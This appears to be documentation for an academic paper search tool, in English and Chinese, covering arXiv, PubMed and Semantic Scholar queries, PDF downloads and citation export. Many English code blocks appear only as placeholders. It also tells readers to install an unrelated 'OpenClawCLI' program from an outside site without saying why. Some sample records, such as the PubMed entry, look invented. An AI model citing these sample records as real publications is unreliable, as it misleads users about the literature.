Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation Best Practices:
CODEBLOCK0
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|
| Search arXiv | INLINECODE1 |
| Search PubMed |
python scripts/research.py pubmed "covid vaccine" |
| Search Semantic Scholar |
python scripts/research.py semantic "machine learning" |
| Download papers |
python scripts/research.py arxiv "topic" --download |
| Get citations |
python scripts/research.py arxiv "topic" --citations |
| Generate bibliography |
python scripts/research.py arxiv "topic" --format bibtex |
| Save results |
python scripts/research.py arxiv "topic" --output results.json |
Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- - arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- PubMed - Biomedical and life sciences literature
- Semantic Scholar - Computer science and interdisciplinary research
- Google Scholar - Broad academic search (limited, no API)
2. Paper Download
Download full-text PDFs when available.
CODEBLOCK1
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- - BibTeX
- RIS
- JSON
- Plain text
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- - Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
CODEBLOCK2
Available categories:
- -
cs.AI - Artificial Intelligence - INLINECODE9 - Machine Learning
- INLINECODE10 - Computer Vision
- INLINECODE11 - Computation and Language
- INLINECODE12 - Combinatorics
- INLINECODE13 - Optics
- INLINECODE14 - Genomics
- Full list
Output:
CODEBLOCK3
PubMed Search
Search biomedical literature indexed in PubMed.
CODEBLOCK4
Publication types:
- - Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
Output:
CODEBLOCK5
Semantic Scholar Search
Search computer science and interdisciplinary research.
CODEBLOCK6
Output includes:
- - Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
Essential Options
Result Limits
Control the number of results returned.
CODEBLOCK8
Examples:
CODEBLOCK9
Output Formats
Choose how results are formatted.
CODEBLOCK10
Text - Human-readable format (default)
CODEBLOCK11
JSON - Structured data for processing
CODEBLOCK12
BibTeX - For LaTeX documents
CODEBLOCK13
RIS - For reference managers (Zotero, Mendeley)
CODEBLOCK14
Markdown - For documentation
CODEBLOCK15
Save to File
Save results to a file.
CODEBLOCK16
Examples:
CODEBLOCK17
Download Papers
Download full-text PDFs when available.
CODEBLOCK18
Examples:
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
CODEBLOCK20
Example:
CODEBLOCK21
Date Filtering
Filter by publication date.
arXiv:
CODEBLOCK22
PubMed:
CODEBLOCK23
Examples:
CODEBLOCK24
Author Search
Search for papers by specific authors.
CODEBLOCK25
Examples:
CODEBLOCK26
Sort Options
Sort results by different criteria.
CODEBLOCK27
Examples:
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
Common Workflows
Literature Review
Gather papers on a topic for a literature review.
CODEBLOCK29
Finding Recent Research
Track the latest papers in a field.
CODEBLOCK30
Highly Cited Papers
Find influential papers in a field.
CODEBLOCK31
Author Publication History
Track an author's work.
CODEBLOCK32
Building a Reference Library
Create a comprehensive reference collection.
CODEBLOCK33
Cross-Source Validation
Verify findings across multiple databases.
CODEBLOCK34
Output Format Examples
Text Format (Default)
CODEBLOCK35
JSON Format
CODEBLOCK36
BibTeX Format
CODEBLOCK37
RIS Format
CODEBLOCK38
Markdown Format
CODEBLOCK39
Best Practices
Search Strategy
- 1. Start broad - Use general terms to get an overview
- Refine iteratively - Add filters based on initial results
- Use multiple sources - Cross-reference findings
- Check recent papers - Use date filters for current research
Result Management
- 1. Save searches - Use
--output to preserve results - Organize downloads - Create logical directory structures
- Export citations early - Generate BibTeX as you search
- Track sources - Note which database returned which papers
Download Guidelines
- 1. Respect rate limits - Don't download hundreds of papers at once
- Check licensing - Verify you have rights to use papers
- Organize by topic - Use clear directory names
- Keep metadata - Save JSON alongside PDFs
Citation Practices
- 1. Verify citations - Check DOIs and URLs
- Use standard formats - BibTeX for LaTeX, RIS for reference managers
- Include abstracts - Helpful for later review
- Update regularly - Re-run searches for new papers
Troubleshooting
Installation Issues
"Missing required dependency"
CODEBLOCK40
"OpenClawCLI not found"
- - Download from https://clawhub.ai/
- Install for your OS (Windows/MacOS)
Search Issues
"No results found"
- - Try broader search terms
- Check spelling and terminology
- Remove restrictive filters
- Try a different database
"Rate limit exceeded"
- - Wait a few minutes before retrying
- Reduce
--max-results value - Space out requests
"Download failed"
- - Check internet connection
- Some papers may not have PDFs available
- Verify you have permissions to access
- Try downloading individually
API Issues
"API timeout"
- - The service may be temporarily unavailable
- Retry after a moment
- Check status at respective service websites
"Invalid API response"
- - Check if the service is down
- Verify your query syntax
- Try simpler queries
Limitations
Access Restrictions
- - Not all papers have downloadable PDFs
- Some content requires institutional access
- Paywalled journals may only show abstracts
- Google Scholar has strict rate limits
Data Completeness
- - Citation counts may be outdated
- Not all metadata fields available for every paper
- Some older papers may have incomplete records
- Preprints may not have final publication info
Search Capabilities
- - Boolean operators vary by source
- No unified query syntax across databases
- Some databases don't support all filters
- Results may differ from web interface searches
Legal Considerations
- - Respect copyright and licensing
- Don't redistribute downloaded papers
- Follow institutional access policies
- Check terms of service for each database
Command Reference
CODEBLOCK41
Examples by Use Case
Quick Search
CODEBLOCK42
Comprehensive Research
CODEBLOCK43
Citation Management
CODEBLOCK44
Tracking New Research
CODEBLOCK45
Support
For issues or questions:
- 1. Check this documentation
- Run INLINECODE17
- Verify dependencies are installed
- Check database-specific documentation
Resources:
- - OpenClawCLI: https://clawhub.ai/
- arXiv API: https://arxiv.org/help/api
- PubMed API: https://www.ncbi.nlm.nih.gov/books/NBK25501/
- Semantic Scholar API: https://api.semanticscholar.org/
学术研究枢纽
从多个来源(包括arXiv、PubMed、Semantic Scholar等)搜索和检索学术论文。下载PDF文件、提取引用、生成参考文献目录并构建文献综述。
⚠️ 前提条件: 安装 OpenClawCLI(Windows、MacOS)
安装最佳实践:
bash
标准安装
pip install arxiv scholarly pubmed-parser semanticscholar requests
如果遇到权限错误,请使用虚拟环境
python -m venv venv
source venv/bin/activate # 在Windows上:venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
切勿使用 --break-system-packages,因为它可能会损坏系统的Python安装。
快速参考
| 任务 | 命令 |
|---|
| 搜索arXiv | python scripts/research.py arxiv 量子计算 |
| 搜索PubMed |
python scripts/research.py pubmed 新冠疫苗 |
| 搜索Semantic Scholar | python scripts/research.py semantic 机器学习 |
| 下载论文 | python scripts/research.py arxiv 主题 --download |
| 获取引用 | python scripts/research.py arxiv 主题 --citations |
| 生成参考文献目录 | python scripts/research.py arxiv 主题 --format bibtex |
| 保存结果 | python scripts/research.py arxiv 主题 --output results.json |
核心功能
1. 多源搜索
从单一界面跨多个学术数据库进行搜索。
支持的来源:
- - arXiv - 物理学、数学、计算机科学、定量生物学、定量金融学、统计学
- PubMed - 生物医学和生命科学文献
- Semantic Scholar - 计算机科学和跨学科研究
- Google Scholar - 广泛的学术搜索(有限制,无API)
2. 论文下载
下载可用的全文PDF文件。
bash
python scripts/research.py arxiv 深度学习 --download --output-dir papers/
3. 引用提取
从论文中提取并格式化引用。
支持的格式:
4. 元数据检索
获取每篇论文的全面元数据:
- - 标题、作者、摘要
- 出版日期
- 期刊/会议
- DOI、arXiv ID、PubMed ID
- 引用次数
- 参考文献
特定来源命令
arXiv搜索
搜索arXiv预印本库。
bash
基本搜索
python scripts/research.py arxiv 量子计算
按类别筛选
python scripts/research.py arxiv 神经网络 --category cs.LG
按日期筛选
python scripts/research.py arxiv Transformer --year 2023
下载论文
python scripts/research.py arxiv 注意力机制 --download --max-results 10
可用类别:
- - cs.AI - 人工智能
- cs.LG - 机器学习
- cs.CV - 计算机视觉
- cs.CL - 计算与语言
- math.CO - 组合数学
- physics.optics - 光学
- q-bio.GN - 基因组学
- 完整列表
输出:
- 1. Attention Is All You Need
作者:Vaswani等人
出版日期:2017-06-12
arXiv ID:1706.03762
类别:cs.CL, cs.LG
摘要:主流的序列转换模型...
PDF:http://arxiv.org/pdf/1706.03762v5
PubMed搜索
搜索PubMed索引的生物医学文献。
bash
基本搜索
python scripts/research.py pubmed 癌症免疫治疗
按日期范围筛选
python scripts/research.py pubmed CRISPR --start-date 2023-01-01 --end-date 2023-12-31
按出版类型筛选
python scripts/research.py pubmed 新冠疫苗 --publication-type 临床试验
获取全文链接
python scripts/research.py pubmed 基因治疗 --full-text
出版类型:
输出:
- 1. mRNA疫苗对COVID-19的有效性
作者:Smith J, Jones K等
期刊:新英格兰医学杂志
出版日期:2023-03-15
PMID:36913851
DOI:10.1056/NEJMoa2301234
摘要:背景:mRNA疫苗已显示...
全文:https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
Semantic Scholar搜索
搜索计算机科学和跨学科研究。
bash
基本搜索
python scripts/research.py semantic 强化学习
按年份筛选
python scripts/research.py semantic 图神经网络 --year 2022
获取高引用论文
python scripts/research.py semantic Transformer --min-citations 100
包含参考文献
python scripts/research.py semantic BERT --include-references
输出包括:
- - 引用次数
- 有影响力的引用次数
- 参考文献列表
- 引用论文
- 研究领域
输出:
- 1. BERT:深度双向Transformer的预训练
作者:Devlin J, Chang MW, Lee K, Toutanova K
出版日期:2019
论文ID:df2b0e26d0599ce3e70df8a9da02e51594e0e992
引用次数:15000+
有影响力引用次数:2000+
领域:计算机科学、语言学
摘要:我们引入了一种新的语言表示模型...
PDF:https://arxiv.org/pdf/1810.04805.pdf
基本选项
结果数量限制
控制返回的结果数量。
bash
--max-results N # 默认值:10,范围:1-100
示例:
bash
python scripts/research.py arxiv 机器学习 --max-results 5
python scripts/research.py pubmed 糖尿病 --max-results 50
输出格式
选择结果的格式化方式。
bash
--format
文本 - 人类可读格式(默认)
bash
python scripts/research.py arxiv 量子 --format text
JSON - 结构化数据,便于处理
bash
python scripts/research.py arxiv 量子 --format json
BibTeX - 用于LaTeX文档
bash
python scripts/research.py arxiv 量子 --format bibtex
RIS - 用于参考文献管理软件(Zotero、Mendeley)
bash
python scripts/research.py arxiv 量子 --format ris
Markdown - 用于文档
bash
python scripts/research.py arxiv 量子 --format markdown
保存到文件
将结果保存到文件。
bash
--output <文件路径>
示例:
bash
python scripts/research.py arxiv AI --output results.txt
python scripts/research.py pubmed 癌症 --format json --output papers.json
python scripts/research.py semantic NLP --format bibtex --output references.bib
下载论文
下载可用的全文PDF文件。
bash
--download
--output-dir <目录> # PDF保存位置(默认:downloads/)
示例:
bash
下载到默认目录
python scripts/research.py arxiv 深度学习 --download --max-results 5
下载到指定目录
python scripts/research.py arxiv Transformer --download --output-dir papers/nlp/
高级功能
引用提取
从论文中提取引用。
bash
--citations # 提取引用
--citation-format <格式> # bibtex、ris、json(默认:bibtex)
示例:
bash
python scripts/research.py arxiv 注意力机制 --citations --citation-format bibtex --output citations.bib
日期筛选
按出版日期筛选。
arXiv:
bash
--year # 特定年份
--start-date
--end-date
PubMed:
bash
--start-date
--end-date
示例:
bash
python scripts/research.py arxiv 量子 --year 2023
python scripts/research.py pubmed 疫苗 --start-date 2022-01-01 --end-date 2023-12-31